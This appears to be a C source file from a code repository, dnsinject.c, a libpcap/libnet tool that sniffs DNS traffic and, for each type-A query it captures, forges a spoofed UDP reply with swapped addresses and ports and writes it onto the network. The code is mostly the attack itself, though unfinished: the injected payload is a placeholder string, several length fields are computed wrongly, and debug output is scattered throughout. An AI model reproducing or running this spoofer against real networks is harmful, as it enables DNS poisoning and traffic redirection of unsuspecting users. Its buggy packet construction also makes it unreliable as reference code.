-
Notifications
You must be signed in to change notification settings - Fork 0
/
dnsinject.c
425 lines (375 loc) · 13.1 KB
/
dnsinject.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
#include <unistd.h>
#include <pcap.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <time.h>
#include <libnet.h>
#include <stdint.h>
/* default snap length (maximum bytes per packet to capture) */
#define SNAP_LEN 1518
/* ethernet headers are always exactly 14 bytes [1] */
#define SIZE_ETHERNET 14
/* Ethernet addresses are 6 bytes */
//#define ETHER_ADDR_LEN 6
/* UDP header is always 8 bytes */
#define SIZE_UDP 8
/* ICMP header is always 8 bytes */
#define SIZE_ICMP 8
#define ARP_PACKET_TYPE 0x0806
#define IP_PACKET_TYPE 0x0800
/* Ethernet header */
struct sniff_ethernet {
u_char ether_dhost[ETHER_ADDR_LEN]; /* destination host address */
u_char ether_shost[ETHER_ADDR_LEN]; /* source host address */
u_short ether_type; /* IP? ARP? RARP? etc */
};
/* IP header */
struct sniff_ip {
u_char ip_vhl; /* version << 4 | header length >> 2 */
u_char ip_tos; /* type of service */
u_short ip_len; /* total length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
u_char ip_ttl; /* time to live */
u_char ip_p; /* protocol */
u_short ip_sum; /* checksum */
struct in_addr ip_src,ip_dst; /* source and dest address */
};
#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip) (((ip)->ip_vhl) >> 4)
//UDP header
struct sniff_udp{
u_short src_port; /* source port */
u_short dst_port; /* source port */
u_short len; /* length */
u_short checksum;
};
struct dns_header{
u_short id;
u_char rd :1; // recursion desired
u_char tc :1; // truncated message
u_char aa :1; // authoritive answer
u_char opcode :4; // purpose of message
u_char qr :1; // query/response flag
u_char rcode :4; // response code
u_char cd :1; // checking disabled
u_char ad :1; // authenticated data
u_char z :1; // its z! reserved
u_char ra :1; // recursion available
u_short qdcount; /* number of entries in question */
u_short ancount; /* number of resource records in answer */
u_short nscount; /* number of name server resource records in authority records section */
u_short arcount; /* number of resource records in additional records section */
};
struct dns_question_info{
u_short qtype;
u_short qclass;
};
struct dns_question{
char qname[0];
//struct dns_question_info *q;
};
void
got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet);
void
print_payload(const u_char *payload, int len);
void
print_hex_ascii_line(const u_char *payload, int len, int offset);
void dns_head(const struct dns_header* dns){
//int i;
//u_char *d;
//struct dns_header *dns = (struct dns_header*)payload;
printf("ID: %d\n", ntohs(dns->id));
//printf("%d\n", ntohs(dns->flags));
printf("rd: %02x\n", (dns->rd));
printf("tc: %02x\n", (dns->tc));
printf("aa: %02x\n", (dns->aa));
printf("opcode: %02x\n", (dns->opcode));
printf("qr:%02x\n", (dns->qr));
printf("rcode: %02x\n", (dns->rcode));
printf("cd: %02x\n", (dns->cd));
printf("ad: %02x\n", (dns->ad));
printf("z: %02x\n", (dns->z));
printf("ra: %02x\n", (dns->ra));
// printf("%02x\n", (dns->flags)+1);
printf("qd: %d\n", ntohs(dns->qdcount));
printf("an: %d\n", ntohs(dns->ancount));
printf("ns: %d\n", ntohs(dns->nscount));
printf("ar: %d\n", ntohs(dns->arcount));
// d = (u_char *)(payload+(sizeof(struct dns_header)));
//printf("name:\n");
//printf("%s\n", dns->data);
//printf("end\n");
// exit(1);
}
void printEthernetHeader(const struct sniff_ethernet *ethernet) {
int i;
for(i = 0;i<ETHER_ADDR_LEN;i++){
printf("%02x",ethernet->ether_shost[i]);
if(i!=5)
printf(":");
}
printf(" -> ");
for(i = 0;i<ETHER_ADDR_LEN;i++){
printf("%02x",ethernet->ether_dhost[i]);
if(i!=5)
printf(":");
}
printf(" type %#06x",ntohs(ethernet->ether_type));
}
void
got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
struct tm* timestamp;
timestamp = localtime(&header->ts.tv_sec);
char outstr[200];
strftime(outstr, 200, "%F %T", timestamp);
/* declare pointers to packet headers */
const struct sniff_ethernet *ethernet; /* The ethernet header [1] */
const struct sniff_ip *ip; /* The IP header */
//char * payload; /* Packet payload */
const struct sniff_udp *udp; /* UDP header */
const struct dns_header *dnsheader;
struct dns_question* dnsquestion;
struct dns_question_info* dnsinfo;
int size_ip;
//int size_payload;
//int size_udp;
//int len;
//int source_port;
//int destination_port;
int qname_len;
char *qname;
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE];
/* define ethernet header */
ethernet = (struct sniff_ethernet*)(packet);
if(ntohs(ethernet->ether_type) == ARP_PACKET_TYPE){
if(args != NULL){
if(strstr((char *)(packet), (char *)(args))==NULL)
return;
}
printEthernetHeader(ethernet);
printf(" ARP \n");
return;
}
/* define/compute ip header offset */
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
return;
}
/* determine protocol */
switch(ip->ip_p) {
case IPPROTO_UDP:
udp = (struct sniff_udp*)(packet + SIZE_ETHERNET + size_ip);
dnsheader = (struct dns_header *)(packet + SIZE_ETHERNET + size_ip + SIZE_UDP);
/* size_payload = ntohs(ip->ip_len) - (size_ip + SIZE_UDP);
if(args!=NULL)
if(strstr((char *)(payload),(char *)( args))==NULL)
return;
*/ //printf("Src Port: %d\n", ntohs(udp->src_port));
printf("\n%s.%d ", outstr,header->ts.tv_usec);
printEthernetHeader(ethernet);
printf(" len %d\n", (ntohs(ip->ip_len)+SIZE_ETHERNET));
printf(" Ethernet len %d\n", (ntohs(udp->len)));
printf("%s:%d -> ", inet_ntoa(ip->ip_src), ntohs(udp->src_port));
printf("%s:%d ", inet_ntoa(ip->ip_dst), ntohs(udp->dst_port));
//printf("Dst Port: %d\n", ntohs(udp->dst_port));
printf(" UDP\n");
break;
case IPPROTO_IP:
//printf(" Protocol: IP\n");
if(args!=NULL)
if(strstr((char *)packet, (char*)(args))==NULL)
return;
printEthernetHeader(ethernet);
printf("\n");
return;break;
default:
if(args!=NULL)
if(strstr((char *)(packet), (char *)(args))==NULL)
return;
printEthernetHeader(ethernet);
printf("\n");
return;
}
//if (size_payload > 0) {
dnsquestion = (struct dns_question *)(packet + SIZE_ETHERNET + size_ip + SIZE_UDP + 12);
dns_head(dnsheader);
//qname = (char *)(packet + SIZE_ETHERNET + size_ip + SIZE_UDP + 12);
printf("name: %s\n", dnsquestion->qname);
qname_len = 0;
printf("before len\n");
while(dnsquestion->qname[qname_len] != '\0'){
printf("%c", dnsquestion->qname[qname_len]);
qname_len++;
}
qname_len++;
printf("size: %d\n", qname_len);
dnsinfo = (struct dns_question_info *)(packet + SIZE_ETHERNET + size_ip + SIZE_UDP + 12 + qname_len);
printf("qtype: %d\n", ntohs(dnsinfo->qtype));
printf("qclass: %d\n", ntohs(dnsinfo->qclass));
if ((ntohs(dnsinfo->qtype) == 1)){// && (ntohs(dnsheader->flags) == 256)){
/* DNS A Query */
/* Create new packet */
/* Send using sendto() via UDP */
char payload[] = "libnet :D";
struct sniff_udp *spoofed_udp = (struct sniff_udp*) malloc (sizeof(struct sniff_udp));
struct sniff_ip *spoofed_ip = (struct sniff_ip*) malloc (sizeof(struct sniff_ip));
struct sniff_ethernet* spoofed_ethernet = (struct sniff_ethernet*) malloc (sizeof(struct sniff_ethernet));
int bytes_written;
spoofed_udp->src_port = udp->dst_port;
spoofed_udp->dst_port = udp->src_port;
spoofed_udp->len = SIZE_UDP + sizeof(payload);
spoofed_ip->ip_len = size_ip + IP_HL(ip)*4 + SIZE_UDP + sizeof(payload);
spoofed_ip->ip_tos = ip->ip_tos;
spoofed_ip->ip_id = ip->ip_id;
spoofed_ip->ip_off = ip->ip_off;
spoofed_ip->ip_ttl = ip->ip_ttl;
spoofed_ip->ip_p = ip->ip_p;
spoofed_ip->ip_src = ip->ip_dst;
printf("\nCopied %s into spoof src = %s", inet_ntoa(ip->ip_dst), inet_ntoa(spoofed_ip->ip_src));
spoofed_ip->ip_dst = ip->ip_src;
printf("\nCopied %s into spoof dst= %s\n", inet_ntoa(ip->ip_src), inet_ntoa(spoofed_ip->ip_dst));
//spoofed_ethernet->ether_dhost = ethernet->ether_shost;
//spoofed_ethernet->ether_shost = ethernet->ether_dhost;
spoofed_ethernet->ether_type = ethernet->ether_type;
l = libnet_init(LIBNET_LINK, NULL, errbuf); //Need to change NULL to dev
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
printf("Source port: %d\n", ntohs(spoofed_udp->src_port));
printf("Dest port: %d\n", ntohs(spoofed_udp->dst_port));
printf("Len: %d\n", spoofed_udp->len);
if (libnet_build_udp(spoofed_udp->src_port, spoofed_udp->dst_port, spoofed_udp->len, 0, (u_int8_t*) payload, sizeof(payload), l, 0) == -1){
fprintf(stderr, "Error building UDP header: %s\n",libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("Source IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_src));
printf("Dest IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_dst));
if (libnet_build_ipv4(spoofed_ip->ip_len, spoofed_ip->ip_tos, spoofed_ip->ip_id, spoofed_ip->ip_off, spoofed_ip->ip_ttl, spoofed_ip->ip_p, 0, spoofed_ip->ip_src.s_addr, spoofed_ip->ip_dst.s_addr, NULL, 0, l, 0) == -1){
fprintf(stderr, "Error building IP header: %s\n",libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("Source IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_src));
printf("Dest IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_dst));
if (libnet_build_ethernet(ethernet->ether_shost, ethernet->ether_dhost, spoofed_ethernet->ether_type, NULL, 0, l, 0) == -1){
fprintf(stderr, "Error building ethernet header: %s\n",libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("writing to port: %d\n", ntohs(spoofed_udp->dst_port));
printf("Source IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_src));
printf("Dest IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_dst));
bytes_written = libnet_write(l);
printf("Source IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_src));
printf("Dest IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_dst));
if ( bytes_written != -1 ){
printf("%d bytes written to IP %s with source IP %s.\n", bytes_written, inet_ntoa(spoofed_ip->ip_src), inet_ntoa(spoofed_ip->ip_src));
printf("Source IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_src));
printf("Dest IP of spoof: %s\n", inet_ntoa(spoofed_ip->ip_dst));
}else
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
printf("Dont");
}
return;
}
int main(int argc, char **argv)
{
char *dev = NULL; /* capture device name */
char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
pcap_t *handle; /* packet capture handle */
char* filter_exp = NULL; /* filter expression [3] */
struct bpf_program fp; /* compiled filter program (expression) */
bpf_u_int32 mask; /* subnet mask */
bpf_u_int32 net; /* ip */
int num_packets = 1000; /* number of packets to capture */
const char* fname = NULL;
const char* search = NULL;
if(argc>1){
int op;
char *cmdLineOptions = "r:i:s:";
while((op = getopt(argc, argv, cmdLineOptions)) != -1){
switch (op){
case 'i':
dev = optarg;
break;
case 'r':
fname = optarg;
break;
case 's':
search = optarg;
break;
}
}
if(argv[optind]!=NULL){
filter_exp = argv[optind];
}
}
if(fname == NULL){
if(dev==NULL) {
/* find a capture device if not specified on command-line */
dev = pcap_lookupdev(errbuf);
if (dev == NULL) {
fprintf(stderr, "Couldn't find default device: %s\n",
errbuf);
exit(EXIT_FAILURE);
}
}
/* get network number and mask associated with capture device */
if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
fprintf(stderr, "Couldn't get netmask for device %s: %s\n",
dev, errbuf);
net = 0;
mask = 0;
}
/* open capture device */
handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
}
else{
handle = pcap_open_offline(fname, errbuf);
}
if (handle == NULL) {
fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
exit(EXIT_FAILURE);
}
/* compile the filter expression */
if(filter_exp!=NULL){
if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
fprintf(stderr, "Couldn't parse filter %s: %s\n",
filter_exp, pcap_geterr(handle));
exit(EXIT_FAILURE);
}
/* apply the compiled filter */
if (pcap_setfilter(handle, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n",
filter_exp, pcap_geterr(handle));
exit(EXIT_FAILURE);
}
}
/* now we can set our callback function */
pcap_loop(handle, -1, got_packet, search);
/* cleanup */
pcap_freecode(&fp);
pcap_close(handle);
printf("\nCapture complete.\n");
return 0;
}